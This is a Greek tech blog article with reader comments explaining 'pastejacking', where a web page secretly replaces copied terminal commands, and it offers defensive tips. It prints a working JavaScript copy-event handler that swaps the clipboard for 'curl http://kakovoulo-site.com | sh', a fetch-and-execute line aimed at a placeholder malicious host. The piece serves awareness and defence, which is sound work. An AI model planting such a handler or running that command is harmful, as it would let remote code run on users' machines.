Πως μπορούν να σας παραβιάσουν με ένα απλό copy-paste

Μια ασυνήθιστη επίδειξη hacking θα σας κάνει να σκεφτείτε δύο φορές πριν κάνετε οποιοδήποτε κείμενο αντιγραφή – επικόλληση.

copaste

Αυτός είναι ο λόγος που ΠΟΤΕ δεν πρέπει να αντιγράψετε εντολές επικόλλησης απευθείας στο τερματικό σας. Ρωτήστε οποιονδήποτε προγραμματιστή ή διαχειριστή εάν έχει αντιγράψει ποτέ μια γραμμή εντολών ή ένα απόσπασμα κώδικα από τον ιστό. Η απάντηση μάλλον θα ήταν ΝΑΙ. Θα υποθέτετε ότι αυτό που αντιγράψατε είναι αυτό που επικολλάτε, σωστά; Λοιπόν, όχι!

Νομίζετε ότι αντιγράφετε ένα πράγμα, αλλά αντικαθίσταται με κάτι άλλο, όπως κακόβουλο κώδικα. Το μόνο που χρειάζεται είναι μια ενιαία γραμμή κώδικα που εισάγεται στον κώδικα που αντιγράψατε για να δημιουργήσετε μια κερκόπορτα στην εφαρμογή σας.

Αυτή η επίθεση είναι πολύ απλή αλλά μπορεί να προκαλέσει μεγάλες ζημιές. Να δούμε πώς λειτουργεί στην πράξη:

Ευχαριστούμε τον Harel Friedlander για την εγγραφή αυτού του βίντεο.

Ας υποθέσουμε ότι ψάχνετε πώς να ενημερώσετε το ubuntu σας και βρήκατε την παρακάτω εντολή, Την αντιγράφετε. Δοκιμάστε το – αντιγράψτε και επικολλήστε την παρακάτω εντολή:

  Πώς να ζητήσετε από την Google να αφαιρέσει φωτογραφίες ανηλίκων

$ sudo apt

 

Εδώ είναι το JavaScript που τρέχει το exploit.

document.getElementById('copyme').addEventListener('copy', function(e) {
    e.clipboardData.setData('text/plain',
        'echo "τo sudo apt update έγινε [curl http://kakovoulo-site.com | sh]"\n'
    );
    e.preventDefault();
});

Πως να προστατευτώ;

Ο ασφαλέστερος τρόπος είναι να μην επικολλήσετε τίποτα από τον Ιστό στο τερματικό σας. Μια άλλη επιλογή είναι να προσθέσετε “#” πριν την επικόλληση, αυτό θα μετατρέψει την εντολή σε “σχόλιο” και δεν θα την εκτελέσει. Με αυτό τον τρόπο θα δείτε τι θα επικολλήσετε πριν το τρέξει το τερματικό σας. Μπορείτε φυσικά να επικολλήσετε την εντολή σε ένα txt αρχείο πριν την βάλετε στο terminal σας.
Επίσης πολλά τερματικά μπορούν να ρυθμιστούν ώστε να μην τρέχουν αυτόματα όταν επικολλάτε ένα “\n” (νέα γραμμή)

Το παραπάνω ήταν μόνο ένα παράδειγμα γιατί η ευαισθητοποίηση είναι απαραίτητη για την αποφυγή κάθε εισβολής. Υπάρχουν πολλά παραδείγματα πραγματικά κακόβουλα scripts που κυκλοφορούν στο διαδίκτυο.

copy-paste,copy paste,hack,iguru

Written by giorgos

Ο Γιώργος ακόμα αναρωτιέται τι κάνει εδώ....

4 Comments

Leave a Reply
  1. Η άλλη εναλλακτική, βέβαια, είναι να χρησιμοποιήσεις έναν ενδιάμεσο προορισμό (π.χ. text editor), όπου θα φανεί τι πραγματικά έχεις μέσα στο clipboard σου.

  2. Καλησπέρα, Χρόνια Πολλά και Καλή Χρονιά!!

    Θα ήθελα να σε ευχαριστήσω κατ` αρχάς για τα ενημερωτικά άρθρα σου.

    Μία λύση ακόμα η οποία λύνει το παραπάνω πρόβλημα, λειτουργεί σε firefox, about:config >> dom.event.clipboardevents.enabled >> false.

    Ένας φίλος του πιο παραμετροποίησιμου browser στον κόσμο.

Αφήστε μια απάντηση

Η ηλ. διεύθυνση σας δεν δημοσιεύεται. Τα υποχρεωτικά πεδία σημειώνονται με *

Το μήνυμα σας δεν θα δημοσιευτεί εάν:
1. Περιέχει υβριστικά, συκοφαντικά, ρατσιστικά, προσβλητικά ή ανάρμοστα σχόλια.
2. Προκαλεί βλάβη σε ανηλίκους.
3. Παρενοχλεί την ιδιωτική ζωή και τα ατομικά και κοινωνικά δικαιώματα άλλων χρηστών.
4. Διαφημίζει προϊόντα ή υπηρεσίες ή διαδικτυακούς τόπους .
5. Περιέχει προσωπικές πληροφορίες (διεύθυνση, τηλέφωνο κλπ).


51  +    =  58